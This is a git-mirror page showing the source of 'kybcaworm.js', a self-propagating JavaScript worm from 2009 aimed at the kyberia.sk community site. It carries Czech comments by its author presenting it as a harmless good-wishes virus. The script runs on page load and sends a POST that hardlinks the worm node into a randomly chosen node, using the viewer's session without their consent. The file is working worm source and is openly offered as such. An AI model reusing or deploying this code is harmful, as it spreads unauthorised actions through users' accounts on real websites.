Fixed deadlocks in pthread_pause
[mirrors/Programs.git] / javascript / kybcaworm.js
1 I <font color="red">love</font> YOU and i <font color="yellow">wish</font> YOU the greatest <font color="lime">happiness!</font>
2
3 <!--
4
5 Ano spravne. Toto je virus. Neni ale zas tak skodlivy, jak se muze zdat.
6 Jeho primarnim ucelem je sirit dobre prani v pisemne podobe pres celou kyberii.
7 Ve chvili, kdy se zacne prilis rozmahat, bude autorem odstranen.
8 Jak je videt z kodu - nekopiruje se, ale pouze se hardlinkuje, jeho sireni i veskera existence se da tedy zrusit odstranenim jedine nody s id 4499197.
9 Sireni cerva lze sledovat na https://kyberia.sk/id/4499197/1961036
10 Doufam, ze existence tohoto cerva bude kyberiany pochopena tak jak byl zamyslena: Dodat virum novy rozmer a zamerit se na splynuti pocitacu a prirody. Samozrejme take poprat vsem kyberanum stesti na jejich ceste. Pokud by nekoho po tu periodu sve existence cerv obtezoval, tak se predem omlouvam.
11
12 THX: Joa javascript neumim a nemam ho rad, takze bych rad podekoval temto trema strankam, ktere staci k tomu, aby nekdo napsal neco podobneho:
13 - https://kyberia.sk/id/4346119 (by id juraj)
14 - http://nb.vse.cz/~zelenyj/it380/eseje/xdemm06/ajax.htm
15 - http://www.javascriptkit.com/javatutors/randomnum.shtml
16
17 <~~Harvie (cerv vypusten 8.2. 2oo9 - 23:00:00)
18
19 -->
20
21 <script type="text/javascript" language="javascript">
22 var http_request = false;
23
24 function makeRequest() {
25
26 http_request = false;
27
28 if (window.XMLHttpRequest) { // Mozilla, Safari,...
29 http_request = new XMLHttpRequest();
30 } else if (window.ActiveXObject) { // IE
31 try {
32 http_request = new ActiveXObject("Msxml2.XMLHTTP");
33 } catch (e) {
34 try {
35 http_request = new ActiveXObject("Microsoft.XMLHTTP");
36 } catch (e) {}
37 }
38 }
39
40 if (!http_request) {
41 return false;
42 }
43
44 //http_request.onreadystatechange = alertContents;
45 http_request.open('POST', '/id/4499197', true); //co
46 http_request.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
47 //http_request.send('event=put&nodeshell_id=4390629'); //kam (debug)
48 http_request.send( 'event=put&nodeshell_id='+Math.floor(Math.random()*9999999) ); //kam (random!)
49
50 }
51
52 makeRequest();
53 </script>
This page took 0.265866 seconds and 4 git commands to generate.